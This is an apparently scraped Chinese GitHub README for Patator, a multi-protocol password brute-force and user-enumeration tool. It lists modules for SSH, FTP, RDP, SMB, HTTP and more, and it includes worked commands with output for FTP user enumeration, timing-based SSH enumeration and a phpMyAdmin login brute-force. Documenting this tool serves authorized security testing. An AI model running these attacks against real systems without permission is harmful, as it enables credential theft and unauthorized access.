lanjelot/patator

GitHub: lanjelot/patator

一款模块化的多协议暴力破解与枚举工具，支持密码爆破、用户枚举、DNS 枚举和加密文件破解等多种安全测试场景。

Stars: 3858 | Forks: 828

# Patator 编写 Patator 是出于对使用 Hydra、Medusa、Ncrack、Metasploit 模块和 Nmap NSE 脚本进行密码猜测攻击的沮丧。我选择了一种不同的方法，以避免创建又一个暴力破解工具并重蹈覆辙。Patator 是一个用 Python 编写的多线程工具，力求比其前辈更可靠、更灵活。目前它支持以下模块： ``` * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * rdp_gateway : Brute-force RDP Gateway * ajp_fuzz : Brute-force AJP * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * dcom_login : Brute-force DCOM * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * rlogin_login : Brute-force rlogin * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * rdp_login : Brute-force RDP (NLA) * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * ike_enum : Enumerate IKE transforms * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files * sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases * umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes ``` “Patator”这个名字来源于[这里](https://www.youtube.com/watch?v=9sF9fTALhVA)。 Patator 并不对脚本小子友好，请在报告之前阅读下文、[DeepWiki](https://deepwiki.com/lanjelot/patator) 和 [wiki](https://github.com/lanjelot/patator/wiki)。 ## 安装 ``` git clone https://github.com/lanjelot/patator.git git clone https://github.com/danielmiessler/SecLists.git docker build -t patator patator/ docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt ``` ## 用法示例 * FTP : 枚举 `vsftpd/userlist` 中禁止登录的用户 ``` $ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT 19:36:06 patator INFO - 19:36:06 patator INFO - code size time | candidate | num | mesg 19:36:06 patator INFO - ----------------------------------------------------------------------------- 19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful. 19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful. 19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied. 19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied. 19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied. ... ``` 在 `CentOS 7.0-1406` 上的 `vsftpd-3.0.2-9` 上进行了测试。 * SSH : 基于时间的用户枚举 ``` $ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3 17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT 17:45:20 patator INFO - 17:45:20 patator INFO - code size time | candidate | num | mesg 17:45:20 patator INFO - ----------------------------------------------------------------------------- 17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | timed out 17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | timed out 17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | timed out ... ``` 在 `Debian 7.8` 上的 `openssh-server 1:6.0p1-4+deb7u2` 上进行了测试。 * HTTP : 暴力破解 phpMyAdmin 登录 ``` $ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf 11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST 11:53:47 patator INFO - 11:53:47 patator INFO - code size:clen time | candidate | num | mesg 11:53:47 patator INFO - ----------------------------------------------------------------------------- 11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK 11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK ^C 11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s 11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40 ``` Payload #72 是一个误报，原因是出现了一条意外的错误消息： ``` $ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt ... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)

标签：DOS头擦除, FTP暴力破解, HTTP暴力破解, Kali工具, MySQL暴力破解, PE 加载器, PoC, Python, RDP暴力破解, SMB暴力破解, SNMP, SSH暴力破解, VEH, 凭证测试, 加密文件系统, 字典攻击, 密码猜测, 密码破解, 无后门, 暴力破解, 漏洞挖掘, 用户枚举, 网络协议 fuzzing, 网络安全, 请求拦截, 逆向工具, 隐私保护 (function () { var base = (document.querySelector('base') && document.querySelector('base').getAttribute('href')) || ''; var path = base.replace(/\/?$/, '') + '/cap-wasm/cap_wasm.min.js'; window.CAP_CUSTOM_WASM_URL = new URL(path, window.location.href).href; })();